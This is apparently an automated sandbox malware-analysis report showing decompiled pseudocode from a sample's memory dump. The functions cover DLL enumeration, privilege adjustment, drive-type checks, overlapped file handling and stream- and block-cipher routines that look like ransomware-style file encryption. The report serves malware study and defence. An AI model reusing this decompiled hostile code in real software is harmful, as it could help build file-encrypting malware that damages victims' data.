                						 *((intOrPtr*)(_t12 + 6)) = 0x22065fed;
                						 *((short*)(_t12 + 0xa)) = 0xe0ff;
                					}
                					return _t12;
                				}
                				return _t12;
                			}






                0x010f5a8f
                0x010f5a96
                0x010f5a9d
                0x010f5aa5
                0x010f5aa5
                0x010f5aab
                0x00000000
                0x00000000
                0x010f5ab5
                0x010f5aba
                0x010f5ac3
                0x010f5ad4
                0x010f5ad6
                0x010f5ad6
                0x010f5adc
                0x010f5ae1
                0x010f5ae4
                0x010f5ae8
                0x010f5aeb
                0x010f5aeb
                0x00000000
                0x010f5aa5
                0x010f5af7

                APIs
                  • Part of subcall function 010F5928: FindFirstFileW.KERNEL32(C:\Windows\System32\*.dll,?), ref: 010F5A2B
                  • Part of subcall function 010F5928: LoadLibraryW.KERNEL32(?,?,00000000), ref: 010F5A54
                  • Part of subcall function 010F5928: FindClose.KERNEL32(000000FF), ref: 010F5A76
                • RtlAllocateHeap.NTDLL(?,00000000,0000000C,00000000,00000000,00000000,00000000,?,?,010F5EB8,011012AC,010F5AFC,00000000,00000000,4C661836), ref: 010F5AC3
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Find$AllocateCloseFileFirstHeapLibraryLoad
                • String ID:
                • API String ID: 4085420014-0
                • Opcode ID: f8608076c25decb68267d17c8a2485eeca553a77b77796accae106f6757906e8
                • Instruction ID: 56e65e9cb5d4296bb47e03958520f2157f360a0b929e1dad3692fba3f15ff5a0
                • Opcode Fuzzy Hash: f8608076c25decb68267d17c8a2485eeca553a77b77796accae106f6757906e8
                • Instruction Fuzzy Hash: A001D631608305AED7115B6D8C86E2ABBD8DF85270F05806EE746DFAA2C974C815C765
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 31%
                			E010FBCB7() {
                				void* _t17;
                				void* _t19;
                				void* _t33;
                				void* _t39;
                
                				_t17 = CreateFileW( *(_t39 - 0xc), 0xc0000000, 0, 0, 3, 0x48000000, 0); // executed
                				 *(_t39 - 8) = _t17;
                				if( *(_t39 - 8) != 0xffffffff) {
                					_t33 = E010FBB23( *((intOrPtr*)(_t39 + 0xc)),  *((intOrPtr*)(_t39 + 0x10)));
                					if(_t33 != 0) {
                						_t19 = CreateIoCompletionPort( *(_t39 - 8),  *0x11015e0, 0, 0); // executed
                						if(_t19 != 0) {
                							 *(_t33 + 0x24) =  *(_t39 - 8);
                							 *(_t33 + 0x28) = 0;
                							_push(_t33);
                							_push(0);
                							_push(0);
                							_push( *0x11015e0);
                							if( *0x11013bc() != 0) {
                								 *0x11013c0(0x11015e4);
                								 *((intOrPtr*)(_t39 - 4)) = 1;
                							} else {
                								E010F5FB3(_t33);
                								 *0x1101354( *(_t39 - 8));
                							}
                						} else {
                							E010F5FB3(_t33);
                							 *0x1101354( *(_t39 - 8));
                						}
                					} else {
                						E010F5FB3(_t33);
                						 *0x1101354( *(_t39 - 8));
                					}
                				}
                				E010F5FB3( *(_t39 - 0xc));
                				E010F5FB3( *((intOrPtr*)(_t39 + 8)));
                				return  *((intOrPtr*)(_t39 - 4));
                			}







                0x010fbcd3
                0x010fbcd9
                0x010fbce0
                0x010fbcf2
                0x010fbcf6
                0x010fbd16
                0x010fbd1e
                0x010fbd34
                0x010fbd37
                0x010fbd40
                0x010fbd41
                0x010fbd43
                0x010fbd45
                0x010fbd53
                0x010fbd6b
                0x010fbd71
                0x010fbd55
                0x010fbd56
                0x010fbd5e
                0x010fbd5e
                0x010fbd20
                0x010fbd21
                0x010fbd29
                0x010fbd29
                0x010fbcf8
                0x010fbcf9
                0x010fbd01
                0x010fbd01
                0x010fbcf6
                0x010fbd7b
                0x010fbd83
                0x010fbd93

                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,48000000,00000000,?,?), ref: 010FBCD3
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 9351e10340c8331cb3f35e9cbdd6fa417aa16efdf73228dd12b5d0c39072c86c
                • Instruction ID: da8ad94787e2916a5f8df00641e45ba082e95b396ee58f612b0459aa5fd05ae8
                • Opcode Fuzzy Hash: 9351e10340c8331cb3f35e9cbdd6fa417aa16efdf73228dd12b5d0c39072c86c
                • Instruction Fuzzy Hash: E3E01231A44109FAEB216B55FE03BDCBB61EB90721F3082AAF750755D0877116519A44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E010F9524(long __eax) {
                				char _v5;
                				long _t3;
                
                				_t3 = __eax;
                				_v5 = 0;
                				while(1) {
                					asm("lodsd");
                					if(_t3 == 0) {
                						break;
                					}
                					_t3 = RtlAdjustPrivilege(_t3, 1, 0,  &_v5); // executed
                				}
                				return _t3;
                			}





                0x010f9524
                0x010f952b
                0x010f9535
                0x010f9535
                0x010f9538
                0x00000000
                0x00000000
                0x010f9547
                0x010f9547
                0x00000000

                APIs
                • RtlAdjustPrivilege.NTDLL(00000000,00000001,00000000,00000000), ref: 010F9547
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AdjustPrivilege
                • String ID:
                • API String ID: 3260937286-0
                • Opcode ID: ef1dd33dff57545a5c51635e6a90e947f899b57ad2bbeaee771b87315ef523cb
                • Instruction ID: 2c992478a98dfc964e583447e63d779f0e2494c916dd84ea73969cd2ca76ac72
                • Opcode Fuzzy Hash: ef1dd33dff57545a5c51635e6a90e947f899b57ad2bbeaee771b87315ef523cb
                • Instruction Fuzzy Hash: DEE0CD3151820566DB34925C6C06FEA339D4701614F00029DBE46D65C0EA97A64543D1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F88FB(WCHAR* _a4) {
                				int _t2;
                
                				_t2 = GetDriveTypeW(_a4); // executed
                				return _t2;
                			}




                0x010f8901
                0x010f8908

                APIs
                • GetDriveTypeW.KERNEL32(?), ref: 010F8901
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: DriveType
                • String ID:
                • API String ID: 338552980-0
                • Opcode ID: cdbf2642380cd6f74387cd501e60d305963c42ee4c6a52904783c8ff7e6d20b8
                • Instruction ID: 94c55d7c0e8bfee65eb19f0208eff5728cbf367b2fde24808f98b0b07a9cdcee
                • Opcode Fuzzy Hash: cdbf2642380cd6f74387cd501e60d305963c42ee4c6a52904783c8ff7e6d20b8
                • Instruction Fuzzy Hash: 46B0123100410CB7C7011A82E804845BF9CD7103607009031F50804411877294609794
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 37%
                			E010F4CD8(intOrPtr* _a4, void* _a8) {
                				signed char _t340;
                				void* _t427;
                				intOrPtr* _t429;
                
                				_t429 = _a4;
                				_t340 =  *(_t429 + 8);
                				asm("bswap eax");
                				asm("bswap ebx");
                				asm("bswap ecx");
                				asm("bswap edx");
                				 *0x1101010 =  *_t429;
                				 *0x01101014 =  *((intOrPtr*)(_t429 + 4));
                				_t427 = 0x110100f;
                				 *(_t340 + 0x4d8b0c57) =  *(_t340 + 0x4d8b0c57) | _t340;
                				asm("stc");
                				asm("sbb [edx+0x25], dh");
                			}






                0x010f4cde
                0x010f4ceb
                0x010f4cf1
                0x010f4cf3
                0x010f4cf5
                0x010f4cf7
                0x010f4cf9
                0x010f4cfb
                0x010f4cff
                0x010f4d00
                0x010f4d08
                0x010f4d09

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c39d317a7e98f346f1b4c89d31453eb26887e6e7def2422e70541dc34690da40
                • Instruction ID: 3d7065f9f3b54f88b7ba3d8e6662b3f3fc76d9e73435bd71defc9ce5581fb61f
                • Opcode Fuzzy Hash: c39d317a7e98f346f1b4c89d31453eb26887e6e7def2422e70541dc34690da40
                • Instruction Fuzzy Hash: D3E1217AA209039BD765CE19E881625B3A2FB89321F09853C8B95C7F59C739F561CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E010F207C(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				intOrPtr _v72;
                				intOrPtr _v76;
                				signed int _v80;
                				char _v84;
                				signed int _v88;
                				signed int _v92;
                				signed int _v96;
                				signed int _v100;
                				signed int _v104;
                				signed int _v108;
                				signed int _v112;
                				signed int _v116;
                				signed int _v120;
                				signed int _v124;
                				signed int _v128;
                				signed int _v132;
                				void* _t177;
                				signed int _t188;
                				signed int _t220;
                				signed int _t224;
                				signed int _t226;
                				signed int _t233;
                				signed int _t235;
                				signed int _t241;
                				signed char _t242;
                				signed int _t245;
                				signed int _t248;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t254;
                				void* _t256;
                				void* _t258;
                				signed int _t259;
                				signed int _t263;
                				signed int _t264;
                				intOrPtr _t265;
                				void* _t266;
                				intOrPtr _t268;
                				signed int _t270;
                				signed int _t271;
                				signed int _t272;
                				signed int _t275;
                				signed int _t277;
                				signed int _t279;
                				signed int _t281;
                				void* _t284;
                				intOrPtr _t287;
                				signed int _t288;
                				signed int _t289;
                				signed int _t290;
                				signed int _t291;
                				signed int _t292;
                				signed int _t294;
                				signed int _t296;
                				signed int _t298;
                				signed int _t299;
                				signed int _t300;
                				intOrPtr _t301;
                				signed int _t306;
                				signed int _t307;
                				void* _t310;
                				signed int _t312;
                				signed int* _t313;
                
                				_t313 =  &_v132;
                				_t287 = _a12;
                				_v76 = _t287;
                				_v88 = _a8;
                				if(_a4 != 0) {
                					_v72 = _t287 + 0x3c;
                					do {
                						asm("movups xmm0, [esi]");
                						_v84 = 0xa;
                						asm("movups [esp+0x50], xmm0");
                						asm("movups xmm0, [esi+0x10]");
                						asm("movups [esp+0x60], xmm0");
                						asm("movups xmm0, [esi+0x20]");
                						asm("movups [esp+0x70], xmm0");
                						asm("movups xmm0, [esi+0x30]");
                						_t263 = _v24;
                						_t288 = _v52;
                						_v100 = _v28;
                						_v120 = _v32;
                						_v116 = _v36;
                						_v124 = _v40;
                						_v128 = _v44;
                						_v104 = _v48;
                						_v132 = _v56;
                						_v112 = _v60;
                						asm("movups [esp+0x80], xmm0");
                						_t253 = _v8;
                						_t248 = _v12;
                						_t306 = _v16;
                						_t270 = _v20;
                						_v96 = _v64;
                						_t188 = _v68;
                						_v108 = _t188;
                						while(1) {
                							asm("rol eax, 0x7");
                							_t289 = _t288 ^ _t188 + _t270;
                							_v92 = _t289;
                							asm("rol eax, 0x9");
                							_v116 = _v116 ^ _v108 + _t289;
                							_t290 = _v96;
                							asm("rol eax, 0xd");
                							_t271 = _t270 ^ _v116 + _t289;
                							_v80 = _t271;
                							asm("ror eax, 0xe");
                							_v108 = _v108 ^ _v116 + _t271;
                							_t272 = _v104;
                							asm("rol eax, 0x7");
                							_v120 = _v120 ^ _t290 + _t272;
                							asm("rol eax, 0x9");
                							_t307 = _t306 ^ _v120 + _t272;
                							asm("rol eax, 0xd");
                							_t291 = _t290 ^ _v120 + _t307;
                							_v96 = _t291;
                							_t292 = _v100;
                							asm("ror eax, 0xe");
                							_v104 = _t272 ^ _t291 + _t307;
                							asm("rol eax, 0x7");
                							_t249 = _t248 ^ _v128 + _t292;
                							asm("rol eax, 0x9");
                							_v112 = _v112 ^ _t249 + _t292;
                							asm("rol eax, 0xd");
                							_v128 = _v128 ^ _v112 + _t249;
                							asm("ror eax, 0xe");
                							asm("rol eax, 0x7");
                							_v132 = _v132 ^ _t263 + _t253;
                							_v100 = _t292 ^ _v128 + _v112;
                							_t294 = _v108;
                							asm("rol eax, 0x9");
                							_v124 = _v124 ^ _v132 + _t253;
                							asm("rol eax, 0xd");
                							_t264 = _t263 ^ _v124 + _v132;
                							asm("ror eax, 0xe");
                							_t254 = _t253 ^ _v124 + _t264;
                							asm("rol eax, 0x7");
                							_t275 = _v96 ^ _v132 + _t294;
                							_v96 = _t275;
                							_v64 = _t275;
                							asm("rol eax, 0x9");
                							_t296 = _v112 ^ _t275 + _t294;
                							_v112 = _t296;
                							_v60 = _t296;
                							asm("rol eax, 0xd");
                							_v132 = _v132 ^ _t296 + _t275;
                							_t220 = _v132;
                							_v56 = _t220;
                							asm("ror eax, 0xe");
                							_t298 = _v108 ^ _t220 + _t296;
                							asm("rol eax, 0x7");
                							_v128 = _v128 ^ _v92 + _v104;
                							_t224 = _v128;
                							_v44 = _t224;
                							asm("rol eax, 0x9");
                							_v124 = _v124 ^ _t224 + _v104;
                							_t226 = _v124;
                							_v40 = _t226;
                							asm("rol eax, 0xd");
                							_t277 = _v92 ^ _t226 + _v128;
                							_v108 = _t298;
                							_v92 = _t277;
                							asm("ror eax, 0xe");
                							_v52 = _t277;
                							_t279 = _v104 ^ _v124 + _t277;
                							_v68 = _t298;
                							_t299 = _v100;
                							_v104 = _t279;
                							asm("rol eax, 0x7");
                							_t263 = _t264 ^ _v120 + _t299;
                							_v48 = _t279;
                							asm("rol eax, 0x9");
                							_v116 = _v116 ^ _t263 + _t299;
                							_t233 = _v116;
                							_v36 = _t233;
                							asm("rol eax, 0xd");
                							_v120 = _v120 ^ _t233 + _t263;
                							_t235 = _v120;
                							_v32 = _t235;
                							asm("ror eax, 0xe");
                							_t300 = _t299 ^ _t235 + _v116;
                							asm("rol eax, 0x7");
                							_t270 = _v80 ^ _t249 + _t254;
                							_v100 = _t300;
                							_v28 = _t300;
                							_v20 = _t270;
                							asm("rol eax, 0x9");
                							_t306 = _t307 ^ _t270 + _t254;
                							asm("rol eax, 0xd");
                							_t248 = _t249 ^ _t270 + _t306;
                							asm("ror eax, 0xe");
                							_t253 = _t254 ^ _t248 + _t306;
                							_t131 =  &_v84;
                							 *_t131 = _v84 - 1;
                							_t188 = _v108;
                							if( *_t131 == 0) {
                								break;
                							}
                							_t288 = _v92;
                						}
                						_t301 = _v76;
                						_t241 = 0;
                						_t281 = _v88;
                						_v8 = _t253;
                						_v24 = _t263;
                						_t265 = _a4;
                						_v12 = _t248;
                						_v16 = _t306;
                						if( &_v68 > _v72 ||  &_v8 < _t301) {
                							do {
                								asm("movups xmm1, [esp+eax*4+0x50]");
                								asm("movups xmm0, [esi+eax*4]");
                								asm("paddd xmm1, xmm0");
                								asm("movups [esp+eax*4+0x50], xmm1");
                								asm("movups xmm0, [esp+eax*4+0x60]");
                								asm("movups xmm1, [esi+eax*4+0x10]");
                								asm("paddd xmm1, xmm0");
                								asm("movups [esp+eax*4+0x60], xmm1");
                								_t241 = _t241 + 8;
                							} while (_t241 < 0x10);
                							goto L10;
                						} else {
                							do {
                								 *((intOrPtr*)(_t313 + 0x50 + _t241 * 4)) =  *((intOrPtr*)(_t313 + 0x50 + _t241 * 4)) +  *((intOrPtr*)(_t301 + _t241 * 4));
                								_t241 = _t241 + 1;
                							} while (_t241 < 0x10);
                							L10:
                							 *((intOrPtr*)(_t301 + 0x20)) =  *((intOrPtr*)(_t301 + 0x20)) + 1;
                							_t242 = 0x40;
                							asm("adc dword [esi+0x24], 0x0");
                							_t251 =  >  ? 0x40 : _t265;
                							_t266 = 0;
                							if(_t251 == 0) {
                								goto L21;
                							}
                							if(_t251 < 0x20) {
                								L17:
                								if(_t266 >= _t251) {
                									goto L21;
                								}
                								_t256 = _t266 + _t281;
                								_t310 =  &_v68 - _t281;
                								_t284 = _t251 - _t266;
                								do {
                									_t242 =  *((intOrPtr*)(_t256 + _t310));
                									_t256 = _t256 + 1;
                									 *(_t256 - 1) =  *(_t256 - 1) ^ _t242;
                									_t284 = _t284 - 1;
                								} while (_t284 != 0);
                								_t281 = _v88;
                								goto L21;
                							}
                							_t258 = _t281 - 1 + _t251;
                							if(_t281 > _t313 + _t251 + 0x4f) {
                								L14:
                								_t259 = _t281;
                								_t245 =  ~_t281;
                								_t312 = _t251 & 0xffffffe0;
                								_v80 =  &_v68 + _t245;
                								_t281 = _v88;
                								_v84 =  &_v52 + _t245;
                								_t242 = _v80;
                								do {
                									asm("movups xmm0, [ecx]");
                									_t266 = _t266 + 0x20;
                									_t259 = _t259 + 0x20;
                									asm("movups xmm1, [eax+ecx-0x20]");
                									asm("pxor xmm1, xmm0");
                									asm("movups [ecx-0x20], xmm1");
                									asm("movups xmm0, [ecx-0x10]");
                									asm("movups xmm1, [esi+ecx-0x20]");
                									asm("pxor xmm1, xmm0");
                									asm("movups [ecx-0x10], xmm1");
                								} while (_t266 < _t312);
                								goto L17;
                							}
                							_t242 =  &_v68;
                							if(_t258 >= _t242) {
                								goto L17;
                							}
                							goto L14;
                						}
                						L21:
                						_t268 = _a4 - _t251;
                						_v88 = _t281 + _t251;
                						_a4 = _t268;
                					} while (_t268 != 0);
                					return _t242;
                				}
                				return _t177;
                			}



















































































                0x010f207c
                0x010f208a
                0x010f2091
                0x010f209d
                0x010f20a3
                0x010f20ae
                0x010f20b2
                0x010f20b2
                0x010f20b5
                0x010f20bd
                0x010f20c2
                0x010f20c6
                0x010f20cb
                0x010f20cf
                0x010f20d8
                0x010f20dc
                0x010f20e0
                0x010f20e4
                0x010f20ec
                0x010f20f4
                0x010f20fc
                0x010f2104
                0x010f210c
                0x010f2114
                0x010f211c
                0x010f2124
                0x010f212c
                0x010f2133
                0x010f213a
                0x010f2141
                0x010f2148
                0x010f214c
                0x010f2150
                0x010f215a
                0x010f215c
                0x010f215f
                0x010f2167
                0x010f216b
                0x010f216e
                0x010f2178
                0x010f217c
                0x010f217f
                0x010f2187
                0x010f218b
                0x010f218e
                0x010f2192
                0x010f2199
                0x010f219c
                0x010f21a6
                0x010f21a9
                0x010f21b1
                0x010f21b4
                0x010f21b6
                0x010f21bd
                0x010f21c1
                0x010f21cc
                0x010f21d0
                0x010f21d3
                0x010f21dc
                0x010f21df
                0x010f21e9
                0x010f21ec
                0x010f21f8
                0x010f2200
                0x010f2203
                0x010f220d
                0x010f2211
                0x010f2215
                0x010f2218
                0x010f2224
                0x010f2227
                0x010f222f
                0x010f2232
                0x010f223a
                0x010f223d
                0x010f223f
                0x010f2243
                0x010f224e
                0x010f2251
                0x010f2253
                0x010f2257
                0x010f2262
                0x010f2265
                0x010f2269
                0x010f226d
                0x010f2273
                0x010f227a
                0x010f2284
                0x010f2287
                0x010f228b
                0x010f228f
                0x010f2297
                0x010f229a
                0x010f229e
                0x010f22a2
                0x010f22aa
                0x010f22ad
                0x010f22af
                0x010f22b9
                0x010f22bd
                0x010f22c0
                0x010f22c8
                0x010f22ca
                0x010f22ce
                0x010f22d8
                0x010f22dc
                0x010f22df
                0x010f22e1
                0x010f22ec
                0x010f22ef
                0x010f22f3
                0x010f22f7
                0x010f22fd
                0x010f2300
                0x010f2304
                0x010f2308
                0x010f2310
                0x010f2313
                0x010f2318
                0x010f231b
                0x010f231d
                0x010f2321
                0x010f2325
                0x010f232f
                0x010f2332
                0x010f2337
                0x010f233a
                0x010f233f
                0x010f2342
                0x010f2344
                0x010f2344
                0x010f2349
                0x010f234d
                0x00000000
                0x00000000
                0x010f2156
                0x010f2156
                0x010f2353
                0x010f2357
                0x010f2359
                0x010f235d
                0x010f2368
                0x010f236c
                0x010f2373
                0x010f237a
                0x010f2385
                0x010f23a1
                0x010f23a1
                0x010f23a6
                0x010f23aa
                0x010f23ae
                0x010f23b3
                0x010f23b8
                0x010f23bd
                0x010f23c1
                0x010f23c6
                0x010f23c9
                0x00000000
                0x010f2392
                0x010f2392
                0x010f2395
                0x010f2399
                0x010f239a
                0x010f23ce
                0x010f23ce
                0x010f23d4
                0x010f23d9
                0x010f23e0
                0x010f23e3
                0x010f23e7
                0x00000000
                0x00000000
                0x010f23f0
                0x010f2461
                0x010f2463
                0x00000000
                0x00000000
                0x010f2469
                0x010f246c
                0x010f2470
                0x010f2472
                0x010f2472
                0x010f2475
                0x010f2478
                0x010f247b
                0x010f247b
                0x010f2480
                0x00000000
                0x010f2480
                0x010f23f9
                0x010f23fd
                0x010f2407
                0x010f240d
                0x010f240f
                0x010f2419
                0x010f241e
                0x010f2422
                0x010f2426
                0x010f242a
                0x010f2432
                0x010f2432
                0x010f2435
                0x010f2438
                0x010f243b
                0x010f2440
                0x010f2444
                0x010f2448
                0x010f244c
                0x010f2451
                0x010f2455
                0x010f2459
                0x00000000
                0x010f245d
                0x010f23ff
                0x010f2405
                0x00000000
                0x00000000
                0x00000000
                0x010f2405
                0x010f2484
                0x010f248d
                0x010f248f
                0x010f2493
                0x010f249a
                0x00000000
                0x010f24a3
                0x010f24ac

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ae1b344ce7eabeca7d5a0e2004a9b7e15b356c338447e056007cc76e97bc746
                • Instruction ID: bbb68b05b70d3f186d960a320a43773f63f7c9ca60efe0b29dab24614166360a
                • Opcode Fuzzy Hash: 5ae1b344ce7eabeca7d5a0e2004a9b7e15b356c338447e056007cc76e97bc746
                • Instruction Fuzzy Hash: 82D1E4719083818FC790CF29C48165AF7E1FFD8248F549A1EE9D9D3211E770EA998B82
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E010F51E8(signed int* _a4, signed int* _a8) {
                				unsigned int _v8;
                				unsigned int _v12;
                				signed int _v16;
                				unsigned int _v20;
                				unsigned int _v24;
                				signed int _v28;
                				unsigned int _v32;
                				unsigned int _v36;
                				signed int _t239;
                				signed int* _t418;
                				signed int* _t419;
                				unsigned int _t420;
                				unsigned int _t421;
                				signed int* _t422;
                
                				_t419 = _a4;
                				_t418 = 0x1101010;
                				asm("bswap eax");
                				asm("bswap ebx");
                				asm("bswap ecx");
                				asm("bswap edx");
                				_t5 =  &(_t418[1]); // 0x9cd47b4f
                				_t6 =  &(_t418[2]); // 0xb9214f78
                				_t7 =  &(_t418[3]); // 0x36aa46ad
                				_v8 =  *_t419 ^  *0x1101010;
                				_v12 = _t419[1] ^  *_t5;
                				_v16 = _t419[2] ^  *_t6;
                				_v20 = _t419[3] ^  *_t7;
                				_t420 =  *0x1101210; // 0xa
                				_t421 = _t420 >> 1;
                				while(1) {
                					_t24 =  &(_t418[4]); // 0x84
                					_v24 =  *(0x10f24b0 + (_v8 >> 0x18) * 4) ^  *(0x10f28b0 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v20 & 0x000000ff) * 4) ^  *_t24;
                					_t38 =  &(_t418[5]); // 0x1e79d
                					_v28 =  *(0x10f24b0 + (_v12 >> 0x18) * 4) ^  *(0x10f28b0 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v8 & 0x000000ff) * 4) ^  *_t38;
                					_t52 =  &(_t418[6]); // 0x0
                					_v32 =  *(0x10f24b0 + (_v16 >> 0x18) * 4) ^  *(0x10f28b0 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v12 & 0x000000ff) * 4) ^  *_t52;
                					_t66 =  &(_t418[7]); // 0x0
                					_v36 =  *(0x10f24b0 + (_v20 >> 0x18) * 4) ^  *(0x10f28b0 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v16 & 0x000000ff) * 4) ^  *_t66;
                					_t418 =  &(_t418[8]);
                					_t421 = _t421 - 1;
                					if(_t421 == 0) {
                						break;
                					}
                					_v8 =  *(0x10f24b0 + (_v24 >> 0x18) * 4) ^  *(0x10f28b0 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v32 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v36 & 0x000000ff) * 4) ^  *_t418;
                					_t93 =  &(_t418[1]); // 0x1298a18
                					_v12 =  *(0x10f24b0 + (_v28 >> 0x18) * 4) ^  *(0x10f28b0 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v36 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v24 & 0x000000ff) * 4) ^  *_t93;
                					_t107 =  &(_t418[2]); // 0x0
                					_v16 =  *(0x10f24b0 + (_v32 >> 0x18) * 4) ^  *(0x10f28b0 + (_v36 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v28 & 0x000000ff) * 4) ^  *_t107;
                					_t121 =  &(_t418[3]); // 0x0
                					_v20 =  *(0x10f24b0 + (_v36 >> 0x18) * 4) ^  *(0x10f28b0 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10f2cb0 + (_v28 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x10f30b0 + (_v32 & 0x000000ff) * 4) ^  *_t121;
                				}
                				_t422 = _a8;
                				asm("bswap eax");
                				 *_t422 =  *(0x10f34b0 + (_v24 >> 0x18) * 4) & 0xff000000 ^  *(0x10f34b0 + (_v28 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x10f34b0 + (_v32 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x10f34b0 + (_v36 & 0x000000ff) * 4) & 0x000000ff ^  *_t418;
                				_t148 =  &(_t418[1]); // 0x1283110
                				asm("bswap eax");
